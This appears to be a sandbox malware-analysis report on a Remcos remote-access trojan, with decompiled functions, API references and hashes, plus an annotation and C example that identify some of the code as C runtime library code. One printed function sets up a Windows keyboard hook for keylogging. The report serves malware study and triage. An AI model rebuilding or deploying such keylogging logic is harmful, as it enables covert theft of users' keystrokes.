                      							_t10 =  &_v28; // 0x74e459
                      							E0077205A(_t10, 0x7a864c);
                      							asm("int3");
                      							_push(_t41);
                      							_t42 = _t34;
                      							E0074B6F3(_t34, _v36);
                      							 *_t42 = 0x794290;
                      							return _t42;
                      						} else {
                      							_t41 = _v8;
                      							 *0x7adb88 = _t41;
                      							 *((intOrPtr*)( *_t41 + 4))();
                      							E00770269(__eflags, _t41);
                      							goto L5;
                      						}
                      					} else {
                      						_t41 = _t39;
                      						goto L5;
                      					}
                      				}
                      			}

                      APIs
                      • std::_Lockit::_Lockit.LIBCPMT ref: 0074EB01
                      • int.LIBCPMT ref: 0074EB14
                        • Part of subcall function 0074B94C: std::_Lockit::_Lockit.LIBCPMT ref: 0074B95D
                        • Part of subcall function 0074B94C: std::_Lockit::~_Lockit.LIBCPMT ref: 0074B977
                      • std::locale::_Getfacet.LIBCPMT ref: 0074EB1D
                      • std::_Facet_Register.LIBCPMT ref: 0074EB54
                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0074EB5D
                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0074EB7B
                      • std::exception::exception.LIBCMT ref: 0074EB8A
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::exception::exceptionstd::locale::_
                      • String ID: Yt
                      • API String ID: 2287991272-3040663348
                      • Opcode ID: 6335b2b3faf0d0a5d50176f7e2e6aa3a448c20aa580e92d43a3f59e4f3928573
                      • Instruction ID: 43b706998d3ad8b05def8cd5b56e8177bc106fece4fd00c3ed81c1c975a0283d
                      • Opcode Fuzzy Hash: 6335b2b3faf0d0a5d50176f7e2e6aa3a448c20aa580e92d43a3f59e4f3928573
                      • Instruction Fuzzy Hash: A011A772A00118EBCB14ABA8D809DEE7768EF41770B114169F905A7291DF78DE01C7D1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 90%
                      			E00748892(struct HHOOK__** __ecx) {
                      				struct tagMSG _v32;
                      				char _v60;
                      				void* _v64;
                      				void* __edi;
                      				int _t7;
                      				void* _t8;
                      				struct HHOOK__* _t14;
                      				void* _t16;
                      				void* _t22;
                      				struct HHOOK__** _t34;
                      				signed int _t36;
                      				void* _t38;
                      
                      				_t38 = (_t36 & 0xfffffff8) - 0x38;
                      				_t34 = __ecx;
                      				 *0x7abaf0 = __ecx;
                      				if( *((intOrPtr*)(__ecx)) != 0) {
                      					goto L3;
                      				} else {
                      					_t14 = SetWindowsHookExA(0xd, E0074887B, GetModuleHandleA(0), 0);
                      					 *_t34 = _t14;
                      					_t43 = _t14;
                      					if(_t14 != 0) {
                      						while(1) {
                      							L3:
                      							_t7 = GetMessageA( &_v32, 0, 0, 0);
                      							__eflags = _t7;
                      							if(_t7 == 0) {
                      								break;
                      							}
                      							TranslateMessage( &_v32);
                      							DispatchMessageA( &_v32);
                      							__eflags =  *_t34;
                      							if( *_t34 != 0) {
                      								continue;
                      							}
                      							break;
                      						}
                      						_t8 = 0;
                      						__eflags = 0;
                      					} else {
                      						_t16 = E00757226(_t22,  &_v60, GetLastError());
                      						_t39 = _t38 - 0x18;
                      						E007475C2(_t22, _t38 - 0x18, "Keylogger initialization failure: error ", 0, _t43, _t16);
                      						E00742084(_t22, _t39 - 0x14, "[ERROR]");
                      						E00756C80(_t22, 0);
                      						E00741FC7();
                      						_t8 = 1;
                      					}
                      				}
                      				return _t8;
                      			}

                      APIs
                      • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 007488AD
                      • SetWindowsHookExA.USER32 ref: 007488BB
                      • GetLastError.KERNEL32 ref: 007488C7
                        • Part of subcall function 00756C80: GetLocalTime.KERNEL32(00000000), ref: 00756C9A
                      • GetMessageA.USER32 ref: 00748915
                      • TranslateMessage.USER32(?), ref: 00748924
                      • DispatchMessageA.USER32 ref: 0074892F
                      Strings
                      • [ERROR], xrefs: 007488ED
                      • Keylogger initialization failure: error , xrefs: 007488DB
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                      • String ID: Keylogger initialization failure: error $[ERROR]
                      • API String ID: 3219506041-2451335947
                      • Opcode ID: d0b39bcf651d9a3cae98539cfbf954e98142f741b5420a75bc7dd982e7e5ae97
                      • Instruction ID: 86b5a3922562201074eb2e142370b15fda6a55ed443b3abf16f05259b67cec8a
                      • Opcode Fuzzy Hash: d0b39bcf651d9a3cae98539cfbf954e98142f741b5420a75bc7dd982e7e5ae97
                      • Instruction Fuzzy Hash: FF11A372600645ABC7107B75AD0E86B77ECEB96B11B40462EF891C2150EF78D915C763
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00758D28(void* __eflags) {
                      				struct tagMSG _v32;
                      				char _v300;
                      				int _t14;
                      
                      				GetModuleFileNameA(0,  &_v300, 0x104);
                      				 *0x7abec4 = E00758DDA();
                      				0x7abec0->cbSize = 0x1fc;
                      				 *0x7abec8 = 1;
                      				 *0x7abed0 = 0x401;
                      				 *0x7abed4 = ExtractIconA(0,  &_v300, 0);
                      				lstrcpynA(0x7abed8, "Remcos", 0x80);
                      				 *0x7abecc = 7;
                      				Shell_NotifyIconA(0, 0x7abec0);
                      				while(1) {
                      					_t14 = GetMessageA( &_v32, 0, 0, 0);
                      					if(_t14 == 0) {
                      						break;
                      					}
                      					TranslateMessage( &_v32);
                      					DispatchMessageA( &_v32);
                      				}
                      				return _t14;
                      			}

                      APIs
                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00758D41
                        • Part of subcall function 00758DDA: RegisterClassExA.USER32(00000030), ref: 00758E26
                        • Part of subcall function 00758DDA: CreateWindowExA.USER32 ref: 00758E41
                        • Part of subcall function 00758DDA: GetLastError.KERNEL32 ref: 00758E4B
                      • ExtractIconA.SHELL32(00000000,?,00000000), ref: 00758D78
                      • lstrcpynA.KERNEL32(007ABED8,Remcos,00000080), ref: 00758D92
                      • Shell_NotifyIconA.SHELL32(00000000,007ABEC0), ref: 00758DA8
                      • TranslateMessage.USER32(?), ref: 00758DB4
                      • DispatchMessageA.USER32 ref: 00758DBE
                      • GetMessageA.USER32 ref: 00758DCB
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                      • String ID: Remcos
                      • API String ID: 1970332568-165870891
                      • Opcode ID: fa935162bd4ccef8322e8758a75b32d26f4f7262552324233d26932d953d223c
                      • Instruction ID: abf6f0a4b0febd0b25e3b69d1a76b296f37b9967b4ebaa5e61c1676477fc4f41
                      • Opcode Fuzzy Hash: fa935162bd4ccef8322e8758a75b32d26f4f7262552324233d26932d953d223c
                      • Instruction Fuzzy Hash: 730144B1544248ABD7509FA5EC0DEEB7BBCFBC7701F00811AF601921A1DBFC950A8B58
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 77%
                      			E00786532(signed int _a4, void* _a8, unsigned int _a12) {
                      				signed int _v5;
                      				char _v6;
                      				void* _v12;
                      				unsigned int _v16;
                      				signed int _v20;
                      				signed int _v24;
                      				signed int _v28;
                      				void* _v32;
                      				long _v36;
                      				void* _v40;
                      				long _v44;
                      				signed int* _t143;
                      				signed int _t145;
                      				intOrPtr _t149;
                      				signed int _t153;
                      				signed int _t155;
                      				signed char _t157;
                      				unsigned int _t158;
                      				intOrPtr _t162;
                      				void* _t163;
                      				signed int _t164;
                      				signed int _t167;
                      				long _t168;
                      				intOrPtr _t175;
                      				signed int _t176;
                      				intOrPtr _t178;
                      				signed int _t180;
                      				signed int _t184;
                      				char _t191;
                      				char* _t192;
                      				char _t199;
                      				char* _t200;
                      				signed char _t211;
                      				signed int _t213;
                      				long _t215;
                      				signed int _t216;
                      				char _t218;
                      				signed char _t222;
                      				signed int _t223;
                      				unsigned int _t224;
                      				intOrPtr _t225;
                      				unsigned int _t229;
                      				signed int _t231;
                      				signed int _t232;
                      				signed int _t233;
                      				signed int _t234;
                      				signed int _t235;
                      				signed char _t236;
                      				signed int _t237;
                      				signed int _t239;
                      				signed int _t240;
                      				signed int _t241;
                      				signed int _t242;
                      				signed int _t246;
                      				void* _t248;
                      				void* _t249;
                      
                      				_t213 = _a4;
                      				if(_t213 != 0xfffffffe) {
                      					__eflags = _t213;
                      					if(_t213 < 0) {
                      						L58:
                      						_t143 = E0077A4F1();
                      						 *_t143 =  *_t143 & 0x00000000;
                      						__eflags =  *_t143;
                      						 *((intOrPtr*)(E0077A504())) = 9;
                      						L59:
                      						_t145 = E0077695D();
                      						goto L60;
                      					}
                      					__eflags = _t213 -  *0x7aba00; // 0x40
                      					if(__eflags >= 0) {
                      						goto L58;
                      					}
                      					_v24 = 1;
                      					_t239 = _t213 >> 6;
                      					_t235 = (_t213 & 0x0000003f) * 0x30;
                      					_v20 = _t239;
                      					_t149 =  *((intOrPtr*)(0x7ab800 + _t239 * 4));
                      					_v28 = _t235;
                      					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
                      					_v5 = _t222;
                      					__eflags = _t222 & 0x00000001;
                      					if((_t222 & 0x00000001) == 0) {
                      						goto L58;
                      					}
                      					_t223 = _a12;
                      					__eflags = _t223 - 0x7fffffff;
                      					if(_t223 <= 0x7fffffff) {
                      						__eflags = _t223;
                      						if(_t223 == 0) {
                      							L57:
                      							return 0;
                      						}
                      						__eflags = _v5 & 0x00000002;
                      						if((_v5 & 0x00000002) != 0) {
                      							goto L57;
                      						}
                      						__eflags = _a8;
                      						if(_a8 == 0) {
                      							goto L6;
                      						}
                      						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
                      						_v5 = _t153;
                      						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
                      						_t246 = 0;
                      						_t155 = _t153 - 1;
                      						__eflags = _t155;
                      						if(_t155 == 0) {
                      							_t236 = _v24;
                      							_t157 =  !_t223;
                      							__eflags = _t236 & _t157;
                      							if((_t236 & _t157) != 0) {
                      								_t158 = 4;
                      								_t224 = _t223 >> 1;
                      								_v16 = _t158;
                      								__eflags = _t224 - _t158;
                      								if(_t224 >= _t158) {
                      									_t158 = _t224;
                      									_v16 = _t224;
                      								}
                      								_t246 = E0077F98C(_t224, _t158);
                      								E007801F5(0);
                      								E007801F5(0);
                      								_t249 = _t248 + 0xc;
                      								_v12 = _t246;
                      								__eflags = _t246;
                      								if(_t246 != 0) {
                      									_t162 = E00785A9E(_t213, 0, 0, _v24);
                      									_t225 =  *((intOrPtr*)(0x7ab800 + _t239 * 4));
                      									_t248 = _t249 + 0x10;
                      									_t240 = _v28;
                      									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
                      									_t163 = _t246;
                      									 *(_t240 + _t225 + 0x24) = _t236;
                      									_t235 = _t240;
                      									_t223 = _v16;
                      									L21:
                      									_t241 = 0;
                      									_v40 = _t163;
                      									_t215 =  *((intOrPtr*)(0x7ab800 + _v20 * 4));
                      									_v36 = _t215;
                      									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
                      									_t216 = _a4;
                      									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
                      										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
                      										_v6 = _t218;
                      										__eflags = _t218 - 0xa;
                      										_t216 = _a4;
                      										if(_t218 != 0xa) {
                      											__eflags = _t223;
                      											if(_t223 != 0) {
                      												_t241 = _v24;
                      												 *_t163 = _v6;
                      												_t216 = _a4;
                      												_t232 = _t223 - 1;
                      												__eflags = _v5;
                      												_v12 = _t163 + 1;
                      												_v16 = _t232;
                      												 *((char*)(_t235 +  *((intOrPtr*)(0x7ab800 + _v20 * 4)) + 0x2a)) = 0xa;
                      												if(_v5 != 0) {
                      													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x7ab800 + _v20 * 4)) + 0x2b));
                      													_v6 = _t191;
                      													__eflags = _t191 - 0xa;
                      													if(_t191 != 0xa) {
                      														__eflags = _t232;
                      														if(_t232 != 0) {
                      															_t192 = _v12;
                      															_t241 = 2;
                      															 *_t192 = _v6;
                      															_t216 = _a4;
                      															_t233 = _t232 - 1;
                      															_v12 = _t192 + 1;
                      															_v16 = _t233;
                      															 *((char*)(_t235 +  *((intOrPtr*)(0x7ab800 + _v20 * 4)) + 0x2b)) = 0xa;
                      															__eflags = _v5 - _v24;
                      															if(_v5 == _v24) {
                      																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x7ab800 + _v20 * 4)) + 0x2c));
                      																_v6 = _t199;
                      																__eflags = _t199 - 0xa;
                      																if(_t199 != 0xa) {
                      																	__eflags = _t233;
                      																	if(_t233 != 0) {
                      																		_t200 = _v12;
                      																		_t241 = 3;
                      																		 *_t200 = _v6;
                      																		_t216 = _a4;
                      																		_t234 = _t233 - 1;
                      																		__eflags = _t234;
                      																		_v12 = _t200 + 1;
                      																		_v16 = _t234;
                      																		 *((char*)(_t235 +  *((intOrPtr*)(0x7ab800 + _v20 * 4)) + 0x2c)) = 0xa;
                      																	}
                      																}
                      															}
                      														}
                      													}
                      												}
                      											}
                      										}
                      									}
                      									_t164 = E0078E817(_t216);
                      									__eflags = _t164;
                      									if(_t164 == 0) {
                      										L41:
                      										_v24 = 0;
                      										L42:
                      										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
                      										__eflags = _t167;
                      										if(_t167 == 0) {
                      											L53:
                      											_t168 = GetLastError();
                      											_t241 = 5;
                      											__eflags = _t168 - _t241;
                      											if(_t168 != _t241) {
                      												__eflags = _t168 - 0x6d;
                      												if(_t168 != 0x6d) {
                      													L37:
                      													E0077A4CE(_t168);
                      													goto L38;
                      												}
                      												_t242 = 0;
                      												goto L39;
                      											}
                      											 *((intOrPtr*)(E0077A504())) = 9;
                      											 *(E0077A4F1()) = _t241;
                      											goto L38;
                      										}
                      										_t229 = _a12;
                      										__eflags = _v36 - _t229;
                      										if(_v36 > _t229) {
                      											goto L53;
                      										}
                      										_t242 = _t241 + _v36;
                      										__eflags = _t242;
                      										L45:
                      										_t237 = _v28;
                      										_t175 =  *((intOrPtr*)(0x7ab800 + _v20 * 4));
                      										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
                      										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
                      											__eflags = _v5 - 2;
                      											if(_v5 == 2) {
                      												__eflags = _v24;
                      												_push(_t242 >> 1);
                      												_push(_v40);
                      												_push(_t216);
                      												if(_v24 == 0) {
                      													_t176 = E0078608E();
                      												} else {
                      													_t176 = E0078639E();
                      												}
                      											} else {
                      												_t230 = _t229 >> 1;
                      												__eflags = _t229 >> 1;
                      												_t176 = E0078624E(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
                      											}
                      											_t242 = _t176;
                      										}
                      										goto L39;
                      									}
                      									_t231 = _v28;
                      									_t178 =  *((intOrPtr*)(0x7ab800 + _v20 * 4));
                      									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
                      									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
                      										goto L41;
                      									}
                      									_t180 = GetConsoleMode(_v32,  &_v44);
                      									__eflags = _t180;
                      									if(_t180 == 0) {
                      										goto L41;
                      									}
                      									__eflags = _v5 - 2;
                      									if(_v5 != 2) {
                      										goto L42;
                      									}
                      									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
                      									__eflags = _t184;
                      									if(_t184 != 0) {
                      										_t229 = _a12;
                      										_t242 = _t241 + _v36 * 2;
                      										goto L45;
                      									}
                      									_t168 = GetLastError();
                      									goto L37;
                      								} else {
                      									 *((intOrPtr*)(E0077A504())) = 0xc;
                      									 *(E0077A4F1()) = 8;
                      									L38:
                      									_t242 = _t241 | 0xffffffff;
                      									__eflags = _t242;
                      									L39:
                      									E007801F5(_t246);
                      									return _t242;
                      								}
                      							}
                      							L15:
                      							 *(E0077A4F1()) =  *_t206 & _t246;
                      							 *((intOrPtr*)(E0077A504())) = 0x16;
                      							E0077695D();
                      							goto L38;
                      						}
                      						__eflags = _t155 != 1;
                      						if(_t155 != 1) {
                      							L13:
                      							_t163 = _a8;
                      							_v16 = _t223;
                      							_v12 = _t163;
                      							goto L21;
                      						}
                      						_t211 =  !_t223;
                      						__eflags = _t211 & 0x00000001;
                      						if((_t211 & 0x00000001) == 0) {
                      							goto L15;
                      						}
                      						goto L13;
                      					}
                      					L6:
                      					 *(E0077A4F1()) =  *_t151 & 0x00000000;
                      					 *((intOrPtr*)(E0077A504())) = 0x16;
                      					goto L59;
                      				} else {
                      					 *(E0077A4F1()) =  *_t212 & 0x00000000;
                      					_t145 = E0077A504();
                      					 *_t145 = 9;
                      					L60:
                      					return _t145 | 0xffffffff;
                      				}
                      			}

                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 793efe8f2169afac88426fb2318154ce1714a0c468934b6ac32728bc491ef64e
                      • Instruction ID: 47841f31f3c0d3bb5befefe111c3a5b8c7ac8f1603f9f797b34797ee330a4700
                      • Opcode Fuzzy Hash: 793efe8f2169afac88426fb2318154ce1714a0c468934b6ac32728bc491ef64e
                      • Instruction Fuzzy Hash: 90C1D3B4E44249BFDF11EFACC845BADBBB4AF49310F188198E505A7392D73C9941CBA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 83%
                      			E0078E8D5(void* __ebx, void* __edi, void* __esi, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
                      				signed int _v8;
                      				char _v22;
                      				struct _cpinfo _v28;
                      				short* _v32;
                      				int _v36;
                      				char* _v40;
                      				int _v44;
                      				intOrPtr _v48;
                      				void* _v60;
                      				signed int _t63;
                      				int _t70;
                      				signed int _t72;
                      				short* _t73;
                      				signed int _t77;
                      				short* _t87;
                      				void* _t89;
                      				void* _t92;
                      				int _t99;
                      				intOrPtr _t101;
                      				intOrPtr _t102;
                      				signed int _t112;
                      				char* _t114;
                      				char* _t115;
                      				void* _t120;
                      				void* _t121;
                      				intOrPtr _t122;
                      				intOrPtr _t123;
                      				intOrPtr* _t125;
                      				short* _t126;
                      				int _t128;
                      				int _t129;
                      				short* _t130;
                      				intOrPtr* _t131;
                      				signed int _t132;
                      				short* _t133;
                      
                      				_t63 =  *0x7aa00c; // 0x67a7e35e
                      				_v8 = _t63 ^ _t132;
                      				_t128 = _a20;
                      				_v44 = _a4;
                      				_v48 = _a8;
                      				_t67 = _a24;
                      				_v40 = _a24;
                      				_t125 = _a16;
                      				_v36 = _t125;
                      				if(_t128 <= 0) {
                      					if(_t128 >= 0xffffffff) {
                      						goto L2;
                      					} else {
                      						goto L5;
                      					}
                      				} else {
                      					_t128 = E007801D9(_t125, _t128);
                      					_t67 = _v40;
                      					L2:
                      					_t99 = _a28;
                      					if(_t99 <= 0) {
                      						if(_t99 < 0xffffffff) {
                      							goto L5;
                      						} else {
                      							goto L7;
                      						}
                      					} else {
                      						_t99 = E007801D9(_t67, _t99);
                      						L7:
                      						_t70 = _a32;
                      						if(_t70 == 0) {
                      							_t70 =  *( *_v44 + 8);
                      							_a32 = _t70;
                      						}
                      						if(_t128 == 0 || _t99 == 0) {
                      							if(_t128 != _t99) {
                      								if(_t99 <= 1) {
                      									if(_t128 <= 1) {
                      										if(GetCPInfo(_t70,  &_v28) == 0) { // CPINFO on the stack: _v28 = MaxCharSize, _v22 = LeadByte[] ranges
                      											goto L5;
                      										} else {
                      											if(_t128 <= 0) {
                      												if(_t99 <= 0) {
                      													goto L36;
                      												} else {
                      													_t89 = 2;
                      													if(_v28 >= _t89) { // MaxCharSize >= 2: double-byte code page, so walk the LeadByte ranges
                      														_t114 =  &_v22;
                      														if(_v22 != 0) {
                      															_t131 = _v40;
                      															while(1) {
                      																_t122 =  *((intOrPtr*)(_t114 + 1));
                      																if(_t122 == 0) {
                      																	goto L15;
                      																}
                      																_t101 =  *_t131;
                      																if(_t101 <  *_t114 || _t101 > _t122) {
                      																	_t114 = _t114 + _t89;
                      																	if( *_t114 != 0) {
                      																		continue;
                      																	} else {
                      																		goto L15;
                      																	}
                      																}
                      																goto L63;
                      															}
                      														}
                      													}
                      													goto L15;
                      												}
                      											} else {
                      												_t92 = 2;
                      												if(_v28 >= _t92) {
                      													_t115 =  &_v22;
                      													if(_v22 != 0) {
                      														while(1) {
                      															_t123 =  *((intOrPtr*)(_t115 + 1));
                      															if(_t123 == 0) {
                      																goto L17;
                      															}
                      															_t102 =  *_t125;
                      															if(_t102 <  *_t115 || _t102 > _t123) {
                      																_t115 = _t115 + _t92;
                      																if( *_t115 != 0) {
                      																	continue;
                      																} else {
                      																	goto L17;
                      																}
                      															}
                      															goto L63;
                      														}
                      													}
                      												}
                      												goto L17;
                      											}
                      										}
                      									} else {
                      										L17:
                      										_push(3); // CSTR_GREATER_THAN: the second string is empty, the first is not
                      										goto L13;
                      									}
                      								} else {
                      									L15:
                      								}
                      							} else {
                      								_push(2); // CSTR_EQUAL: both lengths are zero
                      								L13:
                      							}
                      						} else {
                      							L36:
                      							_t126 = 0;
                      							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t128, 0, 0); // flags 9 = MB_PRECOMPOSED|MB_ERR_INVALID_CHARS, cchWideChar 0: size query only
                      							_v44 = _t72;
                      							if(_t72 == 0) {
                      								L5:
                      							} else {
                      								_t120 = _t72 + _t72;
                      								asm("sbb eax, eax");
                      								if((_t120 + 0x00000008 & _t72) == 0) {
                      									_t73 = 0;
                      									_v32 = 0;
                      									goto L45;
                      								} else {
                      									asm("sbb eax, eax");
                      									_t85 = _t72 & _t120 + 0x00000008;
                      									_t112 = _t120 + 8;
                      									if((_t72 & _t120 + 0x00000008) > 0x400) { // wide bytes + 8-byte marker > 1024: heap, otherwise stack (the _malloca threshold)
                      										asm("sbb eax, eax");
                      										_t87 = E0077F98C(_t112, _t85 & _t112);
                      										_v32 = _t87;
                      										if(_t87 == 0) {
                      											goto L61;
                      										} else {
                      											 *_t87 = 0xdddd; // _malloca heap marker, read back by _freea
                      											goto L43;
                      										}
                      									} else {
                      										asm("sbb eax, eax");
                      										E00790810();
                      										_t87 = _t133;
                      										_v32 = _t87;
                      										if(_t87 == 0) {
                      											L61:
                      											_t100 = _v32;
                      										} else {
                      											 *_t87 = 0xcccc; // _malloca stack marker (block came from __alloca_probe_16)
                      											L43:
                      											_t73 =  &(_t87[4]); // skip the 8-byte marker; this is the buffer actually used
                      											_v32 = _t73;
                      											L45:
                      											if(_t73 == 0) {
                      												goto L61;
                      											} else {
                      												_t129 = _a32;
                      												if(MultiByteToWideChar(_t129, 1, _v36, _t128, _t73, _v44) == 0) { // flags 1 = MB_PRECOMPOSED: the real conversion into the marked buffer
                      													goto L61;
                      												} else {
                      													_t77 = MultiByteToWideChar(_t129, 9, _v40, _t99, _t126, _t126);
                      													_v36 = _t77;
                      													if(_t77 == 0) {
                      														goto L61;
                      													} else {
                      														_t121 = _t77 + _t77;
                      														_t108 = _t121 + 8;
                      														asm("sbb eax, eax");
                      														if((_t121 + 0x00000008 & _t77) == 0) {
                      															_t130 = _t126;
                      															goto L56;
                      														} else {
                      															asm("sbb eax, eax");
                      															_t81 = _t77 & _t121 + 0x00000008;
                      															_t108 = _t121 + 8;
                      															if((_t77 & _t121 + 0x00000008) > 0x400) {
                      																asm("sbb eax, eax");
                      																_t130 = E0077F98C(_t108, _t81 & _t108);
                      																_pop(_t108);
                      																if(_t130 == 0) {
                      																	goto L59;
                      																} else {
                      																	 *_t130 = 0xdddd;
                      																	goto L54;
                      																}
                      															} else {
                      																asm("sbb eax, eax");
                      																E00790810();
                      																_t130 = _t133;
                      																if(_t130 == 0) {
                      																	L59:
                      																	_t100 = _v32;
                      																} else {
                      																	 *_t130 = 0xcccc;
                      																	L54:
                      																	_t130 =  &(_t130[4]);
                      																	L56:
                      																	if(_t130 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t130, _v36) == 0) {
                      																		goto L59;
                      																	} else {
                      																		_t100 = _v32;
                      																		_t126 = E007820FC(_t108, _t130, _v48, _a12, _v32, _v44, _t130, _v36, _t126, _t126, _t126);
                      																	}
                      																}
                      															}
                      														}
                      														E00770BA0(_t130); // __freea: releases the block only if its marker is 0xdddd
                      													}
                      												}
                      											}
                      										}
                      									}
                      								}
                      								E00770BA0(_t100); // __freea
                      							}
                      						}
                      					}
                      				}
                      				L63:
                      				return E0076FD1B(_v8 ^ _t132); // __security_check_cookie
                      			}
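                      Editor's annotation (not part of the Joe Sandbox output, the sample, or Microsoft's CRT): the listing above is library code, not Remcos logic. Its shape is the MSVC C runtime's ANSI-to-wide string compare wrapper: a sizing MultiByteToWideChar call (flags 9, no output buffer), a buffer obtained through _malloca, a second MultiByteToWideChar call that fills it, the same pair again for the second string, and two __freea calls on the way out. The constants that give it away are the 0x400 threshold, the 0xcccc/0xdddd values written at the start of each block, and the 8-byte skip before the buffer is used. The portable C below re-implements that marker convention so the idiom can be recognised in other decompiles; the CRT_* names and helper functions are the example's own, the constants are the x86 values from MSVC's malloc.h, and the buffer contents are constructed.

```c
/* Added example: a portable re-implementation of the MSVC _malloca/_freea
 * marker convention exhibited by the listing above. Not code from the sample
 * or from Microsoft's CRT; the CRT_* names are the example's own, the
 * constants are the x86 values from MSVC's malloc.h. */
#include <alloca.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define CRT_ALLOCA_S_THRESHOLD    0x400u  /* "> 0x400" in the listing: larger blocks go to the heap */
#define CRT_ALLOCA_S_HEAP_MARKER  0xDDDDu /* "*_t87 = 0xdddd" */
#define CRT_ALLOCA_S_STACK_MARKER 0xCCCCu /* "*_t87 = 0xcccc" */
#define CRT_ALLOCA_S_MARKER_SIZE  8u      /* "&(_t87[4])": four shorts skipped before use */

/* Size with the marker prepended. The "sbb eax, eax" idiom in the listing
 * collapses the size to 0 when the addition wraps, so the request fails
 * instead of producing an undersized buffer. */
static size_t crt_malloca_size(size_t n)
{
    size_t total = n + CRT_ALLOCA_S_MARKER_SIZE;
    return total < n ? 0 : total;
}

/* Write the marker at the start of the raw block and return the usable part. */
static void *crt_mark(void *raw, uint32_t marker)
{
    if (raw == NULL)
        return NULL;
    memcpy(raw, &marker, sizeof marker);
    return (char *)raw + CRT_ALLOCA_S_MARKER_SIZE;
}

/* _malloca has to be a macro: alloca() memory lives only until the function
 * that called alloca() returns, which is also why the compiled code shows an
 * inline __alloca_probe_16 rather than a call into a helper. */
#define CRT_MALLOCA(out, n)                                                  \
    do {                                                                     \
        size_t total_ = crt_malloca_size(n);                                 \
        if (total_ == 0) {                                                   \
            (out) = NULL;                                                    \
        } else if (total_ <= CRT_ALLOCA_S_THRESHOLD) {                       \
            void *raw_ = alloca(total_);                                     \
            (out) = crt_mark(raw_, CRT_ALLOCA_S_STACK_MARKER);               \
        } else {                                                             \
            (out) = crt_mark(malloc(total_), CRT_ALLOCA_S_HEAP_MARKER);      \
        }                                                                    \
    } while (0)

/* _freea: read the marker 8 bytes before the pointer and free() only heap
 * blocks. Returns the marker it saw (0 for NULL) so the path is observable. */
static uint32_t crt_freea(void *p)
{
    uint32_t marker;
    if (p == NULL)
        return 0;
    memcpy(&marker, (char *)p - CRT_ALLOCA_S_MARKER_SIZE, sizeof marker);
    if (marker == CRT_ALLOCA_S_HEAP_MARKER)
        free((char *)p - CRT_ALLOCA_S_MARKER_SIZE);
    return marker;
}

/* Mirrors one of the listing's allocations: a wide buffer of `chars` UTF-16
 * units ("_t120 = _t72 + _t72"), filled with constructed data, then released.
 * Returns the marker _freea observed, i.e. which allocator was chosen. */
static uint32_t wide_buffer_roundtrip(size_t chars)
{
    uint16_t *buf;
    CRT_MALLOCA(buf, chars * sizeof *buf);
    if (buf == NULL)
        return 0;
    for (size_t i = 0; i < chars; i++)
        buf[i] = (uint16_t)('A' + i % 26);   /* constructed sample content */
    return crt_freea(buf);
}

int main(void)
{
    printf("100 chars -> marker 0x%x (stack)\n", wide_buffer_roundtrip(100));
    printf("508 chars -> marker 0x%x (stack, exactly 1024 bytes)\n", wide_buffer_roundtrip(508));
    printf("509 chars -> marker 0x%x (heap)\n", wide_buffer_roundtrip(509));
    printf("SIZE_MAX request -> size %zu (overflow guard)\n", crt_malloca_size(SIZE_MAX));
    return 0;
}
```

                      Because _freea decides from the marker alone, the decompile shows E00770BA0 called unconditionally on both exit paths, while E0077F98C (the HeapAlloc subcall listed under APIs) appears only on the "> 0x400" branch. A function with this skeleton can be labelled as CRT and skipped when triaging the sample's own behaviour.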
                      Instruction addresses for the listing above run from 0x0078e8dd to 0x0078eb7c (the per-line address gutter is not preserved in this extraction).

                      APIs
